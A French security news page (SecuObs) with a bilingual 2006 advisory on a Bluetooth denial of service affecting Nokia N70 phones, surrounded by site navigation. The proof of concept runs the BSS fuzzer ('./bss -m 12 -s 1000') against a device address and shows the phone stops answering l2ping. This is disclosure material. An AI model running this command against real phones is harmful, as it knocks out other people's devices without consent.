Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- réseau


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Vigilance - Adobe Flash Player exécution de code, analysé le 02 02 2015
- Vigilance - WordPress Revive Old Post élévation de privilèges, analysé le 02 02 2015
- Vigilance - IBM Tivoli Storage Manager deux vulnérabilités, analysé le 17 04 2015
- Vigilance - SQLite deux vulnérabilités, analysé le 17 04 2015
- Akamai, sacré Meilleur CDN ou service Cloud lors des TV Connect Awards 2015 à Londres
- Check Point CPX 2015 Les grandes annonces de l'évènement
- Un libre blanc de F-Secure fait le lien entre CozyDuke et l'espionnage de grande envergure
- Parents et cyber-harcèlement 38 pourcents d'entre eux ont sensibilisé leurs enfants aux risques d'Internet révèle une enquête Kaspersky Lab
- Peter Smith, Netwrix Les défis de l'audit IT
- Spirent CLEAR DevOps de Spirent est disponible
- Dimension Data remporte 23 prix, dont 3 prix en tant que Global Partner of the Year au Sommet des partenaires Cisco 2015
- Les nouveaux pare-feux réseau FortiGate et solutions FortiClient dédiées offre une protection contre les cybermenaces
- Amateur attackers can steal data from thousands of files in an IaaS cloud
- Le Groupe Fleurus déploie des appliances Watchguard sur 6 sites
- Exer distribue les solutions de détection de vulnérabilités Tenable Network Security

Dernier articles de SecuObs :
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles
- #LPM2013: Un nouvel espoir ?
- L'ANSSI durcit le ton

Revue de presse internationale :
- Hacked Emails Reveal Sony Execs Don't Think Zac Efron Is a 'Comedy Star'
- In Second Trial, Ex-Goldman Sachs Programmer Convicted of Code Theft
- Vintage Computer Festival Europa 16.0 The Hackaday Report
- RoomMote, a DIY Remote for Your Room Project
- Baltimore police data dumped
- Former Malir SSP Rao Anwar escapes grenade attack May 03, 2015,
- NASA Gets Its Marching Orders Look Up Look Out
- The worst spam senders in the whole wide world 60 Sec Security VIDEO
- Ca Confidential medical records found abandoned
- Door Bell Used To Reset WiFi Router
- Back to Basics Good Security Starts with Solid Foundations
- The process used to edit the genes of human embryos is so easy you...
- Bernie Sanders, Presidential Candidate and H-1B Skeptic
- An Exceptionally Small UV Sensor
- CA Court orders hospital to release staff info following patient privacy breach

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Hacking Hardware - Partie 1] - Introduction et présentation
- [WiShMaster - Partie 1] Introduction à l'écriture de shellcodes en C
- [WiShMaster - partie 2] Principe de shellcodisation avec WiShMaster (1)
- [WiShMaster - partie 3] Principe de shellcodisation avec WiShMaster (2)
- [WiShMaster - partie 4] Principe et Fonctionnement - RConnect/WiShMaster Vs firewalls personnels (1)
- DFF, le metasploit du forensic
- Mises à jour en perspective pour le système Vigik
- [IDS Snort Windows – Partie 2] Installation et configuration
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- USBDumper 2 nouvelle version nouvelles fonctions !

Top bi-hebdo de la revue de presse
- 20 Mai Paris conférence GCIC L'Intelligence Economique d'Entreprise au défi du numérique
- Notrefamille.com a choisi d'installer Thunder d'A10 Networks
- A10 Networks améliore les fonctions de sécurité de Thunder ADC
- Smart City le citoyen est devenu un acteur 2.0 de sa ville
- Le Groupe Charlet externalise toute sa DSI dans le cloud Coreye
- Vigilance - EMC NetWorker obtention d'information via nsradmin, analysé le 30 07 2013
- CNIL Avis sur la création du fichier des auteurs d'infractions terroristes FIJAIT
- Radware présente un service de pare-feu applicatif Web pour cloud hybride
- Palo Alto Networks classé comme leader dans le Magic Quadrant des pare-feu de réseaux d'entreprises par Gartner
- Equinix inaugure un datacenter à  la pointe de la technique au Royaume-Uni, son sixième à  Londres

Top bi-hebdo de l'annuaire des videos
- An Tool to analyse tcpdump of Bit torrent and HTTP protocols
- pfSense Quick Look Firewall Content Filter Block Porn Web Proxy Cache
- Tutoriel Supprimer Cacaoweb Botnet
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- install zeus botnet
- Win32 SMB Conficker Removal Tool
- Win32 SMB Conficker Automatic Removal Guide
- Avoir des donuts illimit s sur le jeu Simpsons Springfield
- Comment Pirater Un Ordinateur Avec Ubuntu Metasploit
- Official Maltego tutorial 5 Writing your own transforms

Top bi-hebdo de la revue Twitter
- crack.pl: md5/sha1 cracker/ rainbowtable generator
- Cisco's 2009 Annual Security Report - - (NB: I am emp by Cisco)
- RT @WTFuzz: I just wrote a (rather lengthy) blog post on a few java vulnerabilities, patched in java 1.6.19. Feel f ...
- Newly discovered zero-day exploit bypasses UAC in Windows (bug in win32k.sys)
- RT @id084895: PBX #hacking moves into the professional domain as arrests stack up (a golden oldie #security)
- Installed VMware Server 2.02 on top of Ubuntu Server Edition 9.10 x64.... did need help from here:
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- RT @b3h3m0th: [pdf] Kernel Hacking; Introduction to Linux Kernel 2.6How to write a Rootkit (very good work)
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Failles

English version with Google Translate

[Infratech - vulnérabilité] Déni de Service sur NOKIA N70

Par Pierre Betouin, secuobs.com
Le 10/02/2006


Résumé : Les téléphones portables de la marque scandinave Nokia, modèle N70 sont eux aussi faillibles au Déni de Service provoqué sur la pile Bluetooth via l'utilitaire BSS (cf. bulletin de sécurité pour les téléphones de la marque Sony/Ericsson), Proof of Concept inclu permettant de démontrer la faisabilité du DoS. - Lire l'article



[Version francaise] - [English version]

La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.

Plus d'informations sur les téléphones de cette marque sur lien

En fonction de la version du "Firmware" (logiciel embarqué) et du modèle, l'appareil peut être stoppé (DoS) ou afficher un message "System Error" ( lien )

D'autres modèles de la marque peuvent également être faillibles à ce DoS et doivent être testés avec l'utilitaire de fuzzing Bluetooth Stack Smasher (cf. BSS lien ).

Aucune mise à jour de ce "Firmware" n'est disponible pour l'instant, la seule solution possible est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.

Un nouveau "Firmware" sera peut être disponible auprès du vendeur sous peu.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss


Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien


[English Version] - [Version francaise]

Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).

More information about these devices on lien

This flaw was found using the BSS tool ( Bluetooth Stack Smasher : lien ).

According to the firmware version and to the model, the device can be halted or can display a "System error" message ( lien )

Other Nokia devices may be affected and should be tested with bss fuzzer. Solution is to switch off bluetooth on the phone.

A firmware upgrade may be distributed later by vendor.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:XX:XX:XX
(... snip ...)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:80:37:ZZ:ZZ:ZZ id 0
1 sent, 0 received, 100% loss




- Article suivant : [Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70
- Article précédent : Risque de Déni de Service via les réseaux VoIP privés
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70
- Article précédent dans la catégorie Failles : Compromission de Windows XP via les logiciels AOL, ADOBE, MACROMEDIA & MICROSOFT


Les derniers commentaires de la catégorie Failles:
- ESRT @sambowne - Russian firm Elcomsoft unveils tool to crack BlackBerry encryption security ...
- SPIP recently fixed 2 vulnerabilities notified by Tehtri-Security 0day ...
- PuttyHijack session hijack POC ...
- ESRT @thierryzoller - Updated BEAST blog post with Proof of Concept code and the whitepaper ...
- ESRT @y0ug @Securelist - New article published: MYBIOS Is BIOS infection a reality ...

Les derniers articles de la catégorie Failles :
- Les russes ont-ils pwn le système AEGIS ?
- Backdoors BMC éventuelles via une faille IPMI sur au moins 100 000 serveurs publics
- Jekyll, une application malicieuse contournant les détections de l App Store d Apple
- La vulnérabilité cryptographique d Android, l origine du vol de 5 720 dollars en bitcoins
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Une porte dérobée présente depuis 9 mois dans OpenX
- De mauvaises implémentations d UEFI permettent de contourner Secure Boot
- Prendre le contrôle d une voiture avec une manette de jeu, c est possible
- Une nouvelle vulnérabilité critique aurait été découverte dans Java 7
- Les problèmes de sécurité des cartes SIM peuvent être facilement corrigés




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :